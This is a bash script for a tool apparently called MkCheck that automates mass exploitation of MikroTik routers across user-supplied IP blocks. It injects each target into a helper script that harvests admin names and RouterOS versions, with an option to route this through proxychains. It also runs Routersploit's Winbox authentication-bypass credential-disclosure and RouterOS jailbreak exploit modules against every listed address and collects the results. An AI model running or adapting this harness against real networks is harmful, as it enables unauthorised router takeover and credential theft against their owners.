#!/bin/bash
LPATH='/opt/MkCheck/'
ORNG='\033[0;33m'
NC='\033[0m'
W='\033[1;37m'
LP='\033[1;35m'
YLW='\033[1;33m'
LBBLUE='\e[104m'
RED='\033[0;31m'
LGRY='\033[0;37m'
INV='\e[7m'
BRED='\033[1;31m'
UPURPLE='\033[4;35m'
UBLUE='\033[4;34m'
URED='\033[4;31m'
Z=0

trap "trap_ctrlc" 2
sudo chown $USER:$USER -R /opt/MkCheck
cd /opt/MkCheck
# Root Check
if [[ $EUID -ne 0 ]]; then
   echo "This script must be run as root" 
   exit 1
fi
# Result folder check
if [[ ! -d '/opt/MkCheck/results' ]]; then
	mkdir /opt/MkCheck/results
fi
# RSF folder check
if [[ ! -d '/opt/MkCheck/results/RSF' ]]; then
	mkdir /opt/MkCheck/results/RSF
fi
# Vuln folder check
if [[ ! -d '/opt/MkCheck/results/Vulns' ]]; then
	mkdir /opt/MkCheck/results/Vulns
fi
if [[ ! -f '.conf' ]]; then
	# First check to see if tiks.txt has data
	RE=$(cat /opt/MkCheck/files/tiks.txt)
	if [[ ${RE} == "" ]]; then
		echo -e "${URED}Please enter an IP block to start scanning first${NC}"
		sudo nano /opt/MkCheck/files/tiks.txt
	fi
	# Second check to see if data is example data
	RR=$(cat /opt/MkCheck/files/tiks.txt | grep "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS")
	if [[ ${RR} == "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS" ]]; then
		sudo rm /opt/MkCheck/files/tiks.txt
		echo -e "${URED}Please enter an IP block to start scanning first${NC}"
		nano /opt/MkCheck/files/tiks.txt
	fi
	echo -e "${W}Please enter a name for this session${NC}"
	read SESSION
	echo "${SESSION}" > .conf
	echo -e "${W}Session: ${LP}${SESSION}${NC}"
	cp files/tiks.txt files/.${SESSION}_tiks.txt
	# RSF Session Folder Check
	mkdir /opt/MkCheck/results/RSF/${SESSION}
	mkdir /opt/MkCheck/results/Vulns/${SESSION}
else
	# Check to see if user will keep original data or replace
	SESSION=$(cat .conf)
	echo -e "${W}Previous Session: ${LP}${SESSION}${NC}"
	echo -e "${W}Would you like to ${URED}k${NC}${W}eep previous session or start ${URED}f${NC}${W}resh?${YLW}(k/f)${NC}"
	read CONF
	if [[ ${CONF} == "f" ]]; then
		sudo rm files/tiks.txt files/tiks_res.txt files/tiks_rsf.txt .conf files/.${SESSION}_tiks.txt
		echo -e "${W}Please enter a name for this session${NC}"
		read SESSION
		echo ${SESSION} > .conf
		echo -e "${W}Please enter your target block${NC}"
		sleep 2
		nano files/tiks.txt
		echo -e "${YLW}Backup of this sessions Target file saved as ${UBLUE}${SESSION}_tiks.txt${NC}"
		cp files/tiks.txt files/.${SESSION}_tiks.txt
	else
		sudo cp files/.${SESSION}_tiks.txt files/tiks.txt
	fi
	echo -e "${W}Session: ${LP}${SESSION}${NC}"
	# RSF Session Folder Check
	if [[ ! -d /opt/MkCheck/results/RSF/${SESSION} ]]; then
			mkdir /opt/MkCheck/results/RSF/${SESSION}
	fi
	# Vuln Session Folder Check
	if [[ ! -d /opt/MkCheck/results/Vulns/${SESSION} ]]; then
		mkdir /opt/MkCheck/results/Vulns/${SESSION}
	fi
fi
# Routersploit file check (tiks.rsf.txt)
if [[ -f '/opt/MkCheck/files/tiks_rsf.txt' ]]; then
	RT=$(cat /opt/MkCheck/files/tiks_rsf.txt | grep "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS")
	if [[ ${RT} == "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS" ]]; then
		sudo rm /opt/MkCheck/files/tiks_rsf.txt
		cp /opt/MkCheck/files/tiks.txt /opt/MkCheck/files/tiks_rsf.txt
	fi
else
	sudo cp files/tiks.txt files/tiks_rsf.txt
fi
# Result file check (tiks_res.txt)
if [[ -f '/opt/MkCheck/files/tiks_res.txt' ]]; then
	RS=$(cat /opt/MkCheck/files/tiks_res.txt | grep "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS")
	if [[ ${RS} == "# NOTE THIS IP BLOCK DOES NOT CONTAIN MIKROTIK ROUTERS" ]]; then
		sudo rm /opt/MkCheck/files/tiks_res.txt
		cp /opt/MkCheck/files/tiks.txt /opt/MkCheck/files/tiks_res.txt
	fi
else
	cp /opt/MkCheck/files/tiks.txt /opt/MkCheck/files/tiks_res.txt
fi
target(){
	RARG=$(python3 scripts/get_t.py)
	VAR=$(echo ${RARG})
	FARG='host = "ARG"'
}
# Host Auto Load
running(){
	mv files/tiks1.txt files/tiks.txt
	# Start
	TARG=$(cat scripts/miko.py | grep "host = *")
	sed -i "s/${TARG}/${FARG}/g" scripts/miko.py
	sed -i "s/ARG/${VAR}/g" scripts/miko.py
	echo -e "${UBLUE}Next Target is ${YLW}${VAR}${NC}"
}
trap_ctrlc (){
    # perform cleanup here
    echo -e "${URED}Ctrl-C caught...${NC}"
    echo -e "${W}Would you like to exit?${YLW}(y/n)${NC}"
	read EXIT
	if [[ ${EXIT} == "y" ]]; then
		exit 2
	else
		return
	fi
}
# Final Results Correlation for Net AP Name 
apresults(){
	for log in `cat /opt/MkCheck/files/tiks_res.txt`
		do
			echo "${log}"
			echo "${log}" >> results/Vulns/${SESSION}/final.results
			cat results/Vulns/${SESSION}/${log}.results
			cat results/Vulns/${SESSION}/${log}.results >> results/Vulns/${SESSION}_final.result
			echo "==========================================================================="
		done
	main
}
# Jailbreak Result Correlation
rsfresults(){
	for log in `cat /opt/MkCheck/files/tiks_res.txt`
		do
			echo "${log}"
			echo "${log}" >> results/RSF/${SESSION}/final.results
			cat results/RSF/${SESSION}/${log}.results
			cat results/RSF/${SESSION}/${log}.results >> results/RSF/${SESSION}/final.results
			echo "==========================================================================="
			sleep 2
		done
	main
}
# Mikro Network AP Name Check (No Proxy)
mchecker(){
	while [[ $Z -lt 255 ]];
	do
		echo -e "${RED}Press <CTRL+C> to exit.${NC}"
		target
		echo ""
		running
		echo ""
		sudo python scripts/miko.py | tee output.log
		NAME=$(cat output.log | grep 'admin@')
		VER=$(cat output.log | grep 'MikroTik RouterOS')
		echo "${NAME}" >> results/Vulns/${SESSION}/${VAR}.results
		echo "${VER}" >> results/Vulns/${SESSION}/${VAR}.results
		echo "=================================================" >> results/Vulns/${SESSION}/${VAR}.results
		sudo rm output.log
		Z=$(( $Z + 1 ))
		if [[ ${Z} == 255 ]]; then
			apresults
		fi
	done
}
# Network AP Discovery (with Proxy)
pchecker(){
	while [[ $Z -lt 255 ]];
	do
		echo -e "${RED}Press <CTRL+C> to exit.${NC}"
		target
		echo ""
		running
		echo ""
		proxychains4 sudo python scripts/miko.py | tee output.log
		NAME=$(cat output.log | grep 'admin@')
		VER=$(cat output.log | grep 'MikroTik RouterOS')
		echo "${NAME}" >> results/Vulns/${SESSION}/${VAR}.results
		echo "${VER}" >> results/Vulns/${SESSION}/${VAR}.results
		echo "=================================================" >> results/Vulns/${SESSION}/${VAR}.results
		sudo rm output.log
		Z=$(( $Z + 1 ))
		if [[ ${Z} == 255 ]]; then
			apresults
		fi
	done
}
# Routersploit Vuln Check
rtsploit(){
	cd /root/routersploit
	for name in `cat /opt/MkCheck/files/tiks_rsf.txt`
		do
			#winbox_auth_bypass_creds_disclosure
			WINSAVE=$(sudo python3.7 rsf.py -m exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure -s "target ${name}")
			echo "${WINSAVE}" >> /opt/MkCheck/results/RSF/${SESSION}/${name}.results
			echo "${WINSAVE}" >> /opt/MkCheck/results/RSF/${SESSION}/final.results
			# routeros_jailbreak
			JAIL=$(sudo python3 rsf.py -m exploits/routers/mikrotik/routeros_jailbreak -s "target ${name}")
			echo "${JAIL}" >> /opt/MkCheck/results/RSF/${SESSION}/${name}.results
			echo "${JAIL}" >> /opt/MkCheck/results/RSF/${SESSION}/final.results
			echo "${JAIL}"
			echo "======================================================================" >> /opt/MkCheck/results/RSF/${SESSION}/final.results
		done
}
# Update Args
up_arg(){
    echo $1 >> temp.log
    echo $2 >> temp.log
    echo $3 >> temp.log
    echo $4 >> temp.log
    echo $5 >> temp.log
    echo $6 >> temp.log
    echo $7 >> temp.log
    echo $8 >> temp.log
    echo $9 >> temp.log

    for UFILES in `cat temp.log`
       	        do
    	            rm /opt/MkCheck/${UFILES}
                done
    rm /opt/MkCheck/temp.log
}
update(){
    cd /opt/MkCheck
    echo -e "${ORNG}"
    figlet -f mini "Checking for updates"
    echo -e "${NC}"
    git fetch
    VER=$(git pull)
    if [[ ${VER} == "Already up to date." ]]; then
        echo -e "${LP}"
        figlet -f mini "Up to date."
        echo -e "${NC}"
    else
		sleep 5
	    echo -e "${W}Are there pull conflicts with files?(y/n)${NC}"
        sleep 3
	    read UANS
	    if [[ ${UANS} == "y" ]]; then
            export LPATH
            echo -e "${W}Please enter the conflicting files (seperated by a space)${NC}"
		    read FILES
            sleep 2
		    up_arg ${FILES}
		    git pull
	    else
		    git pull
	    fi
	    if [[ -f '/usr/sbin/mkcheck' ]]; then
			sudo cp mkcheck -t /usr/sbin
			sudo chmod +x /usr/sbin/mkcheck
			sudo chown $USER:$USER /usr/sbin/mkcheck
		fi
		main
	fi
  echo -e "${NC}"
}
# MkCheck Start
main(){
	echo -e "${BRED}"
	python3 files/banner.py
	echo -e "${NC}"
#	echo -e "${W}Hit ${UBLUE}Ctrl + z${NC} ${W}to exit completely or ${UBLUE}Ctrl + c${NC} ${W}to quit a scan${NC}"
	PS3='What tool would you like to use?'
		options=("MikroTik Auto-EX" "Routersploit Vuln Check" "Update") #"Sort Results" 
		select opt in "${options[@]}"
			do
				case $opt in
					"MikroTik Auto-EX")
						echo -e "${W}Would you like to run MCheck using a proxy?${YLW}(y/n)${NC}"
						read PROXY 
						if [[ ${PROXY} == "y" ]]; then
							pchecker
						else
							mchecker
						fi
						;;

					"Routersploit Vuln Check")
						rtsploit
						;;

					"Update")
						update
						;;

				esac
			done
}

cd /opt/MkCheck
echo -e "${LP}"
figlet MkCheck
echo -e "${NC}"
main
exit 1
